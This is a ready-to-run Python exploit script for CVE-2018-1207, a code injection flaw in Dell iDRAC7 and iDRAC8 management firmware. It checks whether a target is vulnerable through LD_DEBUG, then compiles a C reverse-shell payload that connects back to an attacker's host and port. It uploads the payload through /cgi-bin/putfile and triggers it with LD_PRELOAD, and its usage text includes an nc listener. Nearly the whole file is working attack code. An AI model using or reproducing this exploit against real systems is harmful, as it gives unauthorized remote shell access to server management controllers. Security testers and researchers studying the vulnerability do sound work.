# Dell iDRAC7 and iDRAC8 Devices Code Injection Vulnerability (RCE)
# Vulnerable version firmware: <  2.52.52.52
# CVE number: CVE-2018-1207

import requests
import sys
import os
import re
import struct
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

print("""
  ___  _  _  ____     ____   __    __  ____        __  ____   __  ____ 
 / __)/ )( \(  __)___(___ \ /  \  /  \/ _  \ ___  /  \(___ \ /  \(__  )
( (__ \ \/ / ) _)(___)/ __/(  0 )(_/ /) _  ((___)(_/ / / __/(  0 ) / / 
 \___) \__/ (____)   (____) \__/  (__)\____/      (__)(____) \__/ (_/                  
""")

try:
    host = sys.argv[1:][0]
    port = sys.argv[1:][1]
    lhost = sys.argv[1:][2]
    lport = sys.argv[1:][3]
except:
    print("Usage: python ./CVE-2018-1207.py <remote_host> <remote_port> <local_host> <local_port>   ")
    print("       python ./CVE-2018-1207.py 192.168.1.10 443 192.168.1.200 5500")
    print("       nc -v -l -p <local_port>                                         ")
    exit()

payloadbin = 'payload.so'
payloadc = 'payload.c'
timeout = 10
url = 'https://' + str(host) + ':' + str(port)

try:
    r = requests.get(url + '/cgi-bin/login?LD_DEBUG=files', verify=False, timeout=timeout)
except:
    print("An error connecting to the server " + str(url))
    exit()

vul = re.search(r'calling init: /lib/', r.text)
if vul:
    print('[+] Server ' + str(url) + ' is vulnerable')
else:
    print('[-] Server ' + str(url) + ' is not vulnerable')
    exit()

print("Generate Payload")

if os.path.exists(payloadc):
    os.unlink(payloadc)

payload = ("""
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
static void main(void) __attribute__((constructor));
static void main(void)
{
       int pid = fork();
       if(!pid) {
		int sock = socket(AF_INET, SOCK_STREAM, 0);
		struct sockaddr_in serv_addr = {0};
		serv_addr.sin_family = AF_INET;
		serv_addr.sin_port = htons(%d);
		serv_addr.sin_addr.s_addr = inet_addr("%s");
		connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr));
		dup2(sock, 0);
		dup2(sock, 1);
		dup2(sock, 2);
		execl("/bin/sh", "/bin/sh", NULL);
	}
}
""") % (int(lport), lhost)

with open(payloadc, 'w') as file:
    file.write(payload)

if os.path.exists(payloadc):
    cmd = os.system('sh4-linux-gnu-gcc-11 -shared -fPIC ./payload.c -o ./payload.so')
    exit_code = os.WEXITSTATUS(cmd)
    if exit_code == 0:
        print("[+] Generated payload.")
    else:
        print("[!] Error generate payload. Need the package gcc-11-sh4-linux-gnu (apt-get install gcc-11-sh4-linux-gnu).")
        exit()
else:
    print("[!] Error generate payload. Please check the permissions and owner of that directory.")
    exit()

FFLAGS = 1
f = open(payloadbin, 'rb')
payload_so = f.read()
f.close()

f_alias = 'RACPKSSHAUTHKEY1'
res = bytes((f_alias + (32 - len(f_alias)) * '\0'),'utf-8')
res += struct.pack('<L', len(payload_so))
res += struct.pack('<L', FFLAGS)
res += payload_so

print("Upload payload")
r = requests.post(url + '/cgi-bin/putfile', data=res, verify=False, timeout=timeout)

if r.status_code == 200:
    print("[+] OK")
else:
    print("Failed upload Payload")
    exit()

print("Start shell.")
r = requests.get(url + '/cgi-bin/discover?LD_PRELOAD=/tmp/sshpkauthupload.tmp', verify=False, timeout=timeout)
print("Good luck!")

if os.path.exists(payloadc):
    os.unlink(payloadc)

if os.path.exists(payloadbin):
    os.unlink(payloadbin)